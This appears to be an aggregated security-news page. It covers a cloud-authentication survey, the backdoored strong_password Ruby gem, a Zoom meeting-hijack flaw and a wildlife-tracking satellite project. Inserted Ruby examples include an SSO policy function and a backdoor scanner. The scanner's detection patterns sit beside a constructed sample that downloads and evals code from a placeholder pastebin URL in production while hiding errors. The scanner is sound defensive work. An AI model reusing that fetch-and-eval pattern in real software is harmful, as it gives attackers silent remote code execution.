“When you ask a lot of the CISOs, their initial reaction is that they only use a few applications or cloud services,” Lasnier says. “But when you start digging, you realize that sometimes there is a factor of 10 between what a CISO or IT administrator recognizes in the cloud application count versus what is actually the cloud usage.”

Even without an accurate understanding of their cloud exposure, the IT executives are broadly aware of the threats to cloud applications. Ninety-four percent of the executives say that their organizations’ security policies have been influenced by consumer breaches occurring in the last 12 months. The ongoing recognition of email as an attack vector is one of those responses.

“If you can hack into the email system of an organization, then you can start doing ID theft, and then you can start elevating your privilege,” Lasnier explains. Once the process has begun, attackers can then create fake identities, navigate within the company network, and wreak havoc.

The survey shows that access management is evolving to respond to the threat facing cloud applications. According to the results, 70% of companies have begun using two-factor authentication, 53% are using single sign-on (SSO), and 36% have begun using “smart” SSO — SSO that uses policy-based privileges for individual applications and network segments, along with multiple authentication stages when privilege escalation is required.

There are ongoing contradictions in the understanding that executives bring to the issues around authentication and application access. For example, nearly half of the IT executives surveyed said that smart SSO (49%) and biometric multifactor authentication (47%) are among the best tools for protecting cloud and web access, while only 24% saw social identity credentials (using Facebook, Google, or Twitter accounts for authentication) as a best practice.

However, more than half (56%) then said that they would allow employees to log in to enterprise resources using social media credentials for authentication.

Lasnier says that the confusion is largely a result of a rapidly changing enterprise environment that has seen the cloud, bring-your-own-device efforts, exceptional employee mobility, and other factors thrown into a mix that requires secure authentication and access management for users.

The access decision that was once black and white is now multivariable, Lasnier says. “Companies are looking now not just at access management that’s a single point function, but at bundling identity to provide secure access management to applications and to dictate services like encryption rules that can further protect data assets,” he says.
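The “smart” SSO the survey describes (policy-based privileges per application and network segment, with an extra authentication stage when privilege is escalated) and the social-login contradiction above can be made concrete in a few dozen lines. The following is an added example written for this page, not code from Thales, Vanson Bourne or the report; the application names, assurance levels, network segments and time limits are invented for illustration.

```ruby
# Added example (not from the Thales report): the access decision of a
# policy-based ("smart") SSO gateway reduced to one function. All policy
# values below are illustrative, not real products or the survey's data.

# Assurance an authentication factor provides. A social identity scores zero:
# a consumer IdP the enterprise does not control cannot vouch for an employee,
# so a social login on its own never satisfies a policy here.
LEVELS = { social: 0, password: 1, otp: 2, push: 2, hardware_key: 3, biometric: 3 }.freeze

# Per-application policy (illustrative values):
#   min_level     assurance needed to open the application at all
#   elevate_level assurance needed for privileged actions inside it
#   max_age       seconds since the last authentication before a fresh stage is forced
#   segments      network segments the application may be reached from (nil = any)
APP_POLICY = {
  "wiki"        => { min_level: 1, elevate_level: 2, max_age: 8 * 3600, segments: nil },
  "payroll"     => { min_level: 2, elevate_level: 3, max_age: 3600,     segments: %w[corp vpn] },
  "cloud_admin" => { min_level: 3, elevate_level: 3, max_age: 15 * 60,  segments: %w[corp] }
}.freeze

Session  = Struct.new(:user, :factors, :authenticated_at, :network, keyword_init: true)
Decision = Struct.new(:verdict, :required_level, :reason)

# Strongest assurance the session has proven so far.
def assurance(factors)
  factors.map { |f| LEVELS.fetch(f, 0) }.max || 0
end

# verdict is :allow, :step_up (the SSO must run another authentication stage
# reaching required_level before the request proceeds) or :deny.
def decide(session, app:, privileged: false, now: Time.now)
  policy = APP_POLICY[app]
  return Decision.new(:deny, nil, "unknown application #{app}") unless policy

  segments = policy[:segments]
  if segments && !segments.include?(session.network)
    return Decision.new(:deny, nil, "#{app} is not reachable from segment #{session.network}")
  end

  needed = privileged ? policy[:elevate_level] : policy[:min_level]
  have   = assurance(session.factors)
  if have < needed
    return Decision.new(:step_up, needed, "assurance #{have} below required #{needed}")
  end

  # Escalation and sensitive apps also demand a recent authentication, not
  # just a strong one: an old session is a stolen-cookie risk.
  age = now - session.authenticated_at
  if age > policy[:max_age]
    return Decision.new(:step_up, needed, "last authentication #{age.to_i}s ago exceeds #{policy[:max_age]}s")
  end

  Decision.new(:allow, nil, "assurance #{have} is sufficient and fresh")
end

if $PROGRAM_NAME == __FILE__
  s = Session.new(user: "alice", factors: %i[password otp], authenticated_at: Time.now - 300, network: "vpn")
  puts decide(s, app: "payroll").to_h                    # allow
  puts decide(s, app: "payroll", privileged: true).to_h  # step_up to level 3
  puts decide(s, app: "cloud_admin").to_h                # deny: wrong segment
end
```

The point of the structure is that a social credential is treated as an identifier rather than as proof: it lands every request in `:step_up`, so an organisation can let employees log in with a Facebook or Google account without that account ever being the only thing standing between an attacker and payroll.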


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/cloud/organizations-are-adapting-authentication-for-cloud-applications/d/d-id/1335200?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Backdoor discovered in Ruby strong_password library

An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.

A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have pulled in the strong_password library in its backdoored version 0.0.7.

The discovery came about after Epion Health developer Tute Costa noticed something unusual while carefully updating a family of libraries used by his company’s developers, to pick up bug and security fixes.

When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got from 0.0.6 to the updated version, a release made on 25 June 2019.

The GitHub repository, by contrast, had last been updated in October 2018. Comparing the two, he noticed that the mystery 0.0.7 release embedded code which, in his words:

Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.

The backdoor would download code from the Pastebin address on production sites, giving the attackers remote code execution and silently hijacking any website unfortunate enough to have updated to the rogue strong_password gem.

Adding to this, the rogue version had been published by an otherwise empty RubyGems account under a name different from that of the official maintainer, Brian McManus, whose own account appears to have been hijacked. He replied to an email from Costa to say:

The gem seems to have been pulled out from under me… When I login to rubygems.org I don’t seem to have ownership now.

The issue has been assigned CVE-2019-13354. The backdoored version has been pulled from RubyGems and replaced with a clean 0.0.8.

Part of a pattern

This wasn’t a speculative attack: somebody thought about what they were doing and set out to insert the backdoor in a way that might not be noticed straight away. By firing only in production and discarding any error it raised, the payload would never show up in a developer’s test run or as a failing build.

It also fits a troubling pattern of recent targeting of Ruby libraries, including the RCE discovered inside the Bootstrap-Sass Ruby library in April.

That hijacking was noticed even more quickly than strong_password’s, but the sheer number of libraries used by RoR (and other development frameworks in the firing line) raises the issue of how much oversight is appropriate when new versions appear.
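One piece of that oversight can be automated. The following is an added example written for this page, not code from the strong_password gem, RubyGems or Costa’s write-up: a heuristic scan for the shape of backdoor described above (fetch remote code, eval it, only in production, swallow every error), using Ruby’s own parser to find exception handlers that discard everything. The two sample sources it is run against are constructed for the example; the first mirrors the described pattern with a placeholder URL and is not the real 0.0.7 payload.

```ruby
# Added example (not code from strong_password or RubyGems): scan Ruby source
# for the backdoor pattern described in the article. Point scan_directory at
# the unpacked files of a gem update (for instance after
# `gem fetch strong_password -v 0.0.7 && gem unpack strong_password-0.0.7.gem`)
# before that update is allowed into the Gemfile.lock.
require "ripper"

# Text-level rules. The patterns are this example's own choices, not an
# exhaustive list; honest code can hit any single one of them.
RULES = {
  remote_fetch:    /open-uri|OpenURI|URI\.open|Net::HTTP|open\s*\(\s*['"]https?:/,
  dynamic_eval:    /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  production_gate: /Rails\.env\.production\?|R(?:ACK|AILS)_ENV[^\n]*production/,
  pastebin:        /pastebin\.com/i
}.freeze

# Walk the real parse tree for handlers that discard every error: a
# `rescue ... end` with an empty body, or an `expr rescue nil` modifier.
# Using Ripper rather than a regex means comments and strings cannot fool it.
def empty_rescue?(source)
  tree = Ripper.sexp(source)
  return false unless tree

  walk = lambda do |node|
    return false unless node.is_a?(Array)
    if node[0] == :rescue
      # Ripper shape: [:rescue, exception_list, variable, body, next_rescue]
      body = node[3]
      return true if body.nil? || (body.is_a?(Array) && body.all? { |stmt| stmt == [:void_stmt] })
    elsif node[0] == :rescue_mod
      # Ripper shape: [:rescue_mod, expression, handler_expression]
      handler = node[2]
      return true if handler.is_a?(Array) && handler[0] == :var_ref &&
                     handler[1].is_a?(Array) && handler[1][0..1] == [:@kw, "nil"]
    end
    node.any? { |child| walk.call(child) }
  end
  walk.call(tree)
end

# All rule names that fire for one source string.
def suspicious_findings(source)
  hits = RULES.select { |_, re| source.match?(re) }.keys
  hits << :empty_rescue if empty_rescue?(source)
  hits
end

# The combination is the signal: remote code that is eval'd, together with
# either a production-only gate (so test suites never execute it) or a
# handler that hides every failure. Either companion makes fetch+eval look
# deliberate rather than sloppy.
def backdoor_like?(source)
  f = suspicious_findings(source)
  f.include?(:remote_fetch) && f.include?(:dynamic_eval) &&
    (f.include?(:production_gate) || f.include?(:empty_rescue))
end

# Report every .rb file under an unpacked gem directory that trips a rule.
def scan_directory(dir)
  Dir.glob(File.join(dir, "**", "*.rb")).each_with_object({}) do |path, report|
    f = suspicious_findings(File.read(path))
    report[path] = f unless f.empty?
  end
end

# Constructed sample mirroring the pattern in Costa's description. This is
# NOT the real 0.0.7 payload; the URL is a placeholder.
BACKDOOR_LIKE = <<~'RUBY'
  def quietly
    yield
  rescue Exception
  end

  quietly do
    require 'open-uri'
    eval(URI.open('https://pastebin.com/raw/PLACEHOLDER').read) if Rails.env.production?
  end
RUBY

# Constructed benign sample: real network code that handles its own errors.
BENIGN = <<~'RUBY'
  require 'net/http'

  def fetch_status(uri)
    Net::HTTP.get_response(URI(uri)).code
  rescue SocketError => e
    warn "lookup failed: #{e.message}"
    nil
  end
RUBY

if $PROGRAM_NAME == __FILE__
  puts "backdoor-like: #{suspicious_findings(BACKDOOR_LIKE).inspect}"
  puts "benign:        #{suspicious_findings(BENIGN).inspect}"
end
```

Run against a fresh `gem unpack`, a non-empty report is a prompt to read the diff against the project’s GitHub tag before the version reaches production, which is exactly the check Costa made by hand.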

Luckily, on this occasion, a developer was paying attention. When it comes to security, sometimes someone noticing that something is awry is all that stands between a large community of developers and disaster.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/4pxSq0OgLT8/

Zoom flaw could force you into a meeting, expose your video feed

Zoom, a company that sells video conferencing software for the business market, is tweaking the app to fix a vulnerability in its software that allows malicious websites to force users into a Zoom call with the webcam turned on.

The flaw was discovered by security researcher Jonathan Leitschuh, who documented it in a blog post on Monday.

He said that initially, the vulnerability would have also allowed any webpage to inflict a denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an invalid call. But that DoS vulnerability – CVE-2019-13449 – was fixed in version 4.4.2 of the macOS client.

In discussions with the Zoom team over the past few weeks, Leitschuh said that Zoom had proposed a fix to the hijacking vulnerability: namely, digitally signing requests from websites that are made to the client.

But the researcher said that wouldn’t have solved the problem: an attacker could simply set up a server that makes the same requests to the Zoom site, obtain a valid signature, and then pass the signed request on to the client. The signature would prove only that Zoom’s site had issued the request, not that the web page presenting it to the user could be trusted.

Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]

There was another problem the researcher found: when setting up a meeting, you can enable the video setting to “Participants: On” for all those who join a meeting. That removes a participant’s choice of whether or not to have their video connected and instead automatically joins them to a meeting with their video on.

Because the Zoom client keeps a local web server running in the background, an attacker could embed a Zoom join link in their website and any Zoom user who visited would be connected instantly, with their video feed turned on, even if they weren’t running the Zoom software in the foreground.

Zoom sent a statement to multiple publications in which it said that it developed the local web server in response to changes that Apple introduced in Safari 12.

It did so in order to save the user some clicks in what had become a cumbersome log-in, it said:

[Running a local server in the background was a] legitimate solution to a poor user experience, enabling our users to have seamless, one-click-to-join meetings, which is our key product differentiator.

Starting this month, Zoom will save users’ and administrators’ preferences for whether video will be turned on or not. On all of its platforms, it will save the user’s choice on whether or not to turn off video in their first call and will apply that choice to future meetings.

From Zoom’s statement:

All first-time Zoom users, upon joining their first meeting from a given device, are asked whether they would like their video to be turned OFF.

For subsequent meetings, users can configure their client video settings to turn OFF video when joining a meeting. Additionally, system administrators can pre-configure video settings for supported devices at the time of install or change the configuration at anytime.

What to do?

Fortunately there’s something you can do to mitigate the issue:

  • Launch the Zoom app.
  • Open the Settings page (on a Mac, use Preferences or press Command-Comma).
  • Click the Video option.
  • Enable the setting Turn off my video when joining a meeting.

On a Mac, you can also block Zoom’s access to your camera altogether via System Preferences:

  • Click on the Apple menu (top left corner of your screen).
  • Choose System Preferences…
  • Click the Security & Privacy icon.
  • Click the Camera option.
  • Review which apps have access to your camera.

(To alter the setting for any app, you will first need to click on the padlock icon and enter your password to authorise the changes. That’s a precaution to prevent ill-behaved or buggy apps simply changing the setting back.)

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/VaJP9KjIncg/

Boffins ready to go live with system that will track creatures great and small from space

Boffins at the Max Planck Institute for Ornithology are finally ready to switch on Icarus – a system that will track the migration of animals by using an antenna installed at the International Space Station (ISS).

On the ground, scientists have been equipping hundreds of animals with miniature satellite transmitters. On Wednesday, astronauts will flip the switch aboard the ISS and start operation of the ground station in Immenstaad, Germany.

Following extensive tests using simulated transmitters, the system will be made available to the scientific community before the end of the year.

Icarus (International Cooperation for Animal Research Using Space) is a collaboration between German and Russian scientists in the works since 2002. It involves Russian space agency Roskosmos, the German Aerospace Centre (DLR), and the Max Planck Institute for Ornithology, among others.

As part of the project, Russian cosmonauts installed the three-metre antenna – and its onboard computer – on an ISS module called Zvezda (star) during a spacewalk in August 2018.

The ISS will collect signals from special lightweight transmitters, designed by German space equipment specialist SpaceTech, weighing less than five grams each, and powered by the Sun. Besides GPS, these transmitters are also equipped with accelerometers, temperature, pressure and humidity sensors.

The space station will then beam the measurement data to a ground station, where it will be processed and made freely available to anyone through the Movebank animal tracking database. This obviously excludes data on endangered species – you wouldn’t want to make things any easier for poachers.

Today, most animal-tagging projects focus on a single species, in a small geographic area. Satellite tracking is possible, but this is currently achieved through the outdated Argos system, in use since 1978 and limited to larger animals. In comparison, Icarus can track beasties as light as 100g in body weight.

The Icarus project hopes to apply modern tech to track up to 200,000 individual animals worldwide. Initial targets include bears, elephants, antelopes, wildebeest, giraffes, zebras and leopards; the team at Max Planck Institute for Ornithology is obviously most interested in birds, and the sensors can even track fish.

“Icarus could do for our understanding of planet Earth what the human genome project with its decoding of human genetic material did for genetics,” the project’s website states.

Data obtained by the project will help establish migration patterns, response to environmental changes, and whether (and how) animals can predict natural disasters like earthquakes and volcanic eruptions – there’s plenty of anecdotal evidence, but this has never been decisively proven.

“The animals have evolved for millions of years, their senses are tuned to the environment, they have better hardware: their noses are better, their ears are better, and they also have better sensory systems to deal with this information,” Martin Wikelski, managing director at Max Planck Institute for Ornithology and project leader, said in 2018.

“If we take many of those animals together, then we have a network of intelligent, distributed sensors that have evolved to sense the environment.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/09/icarus_project_is_going_live_to_track_wildlife_from_space/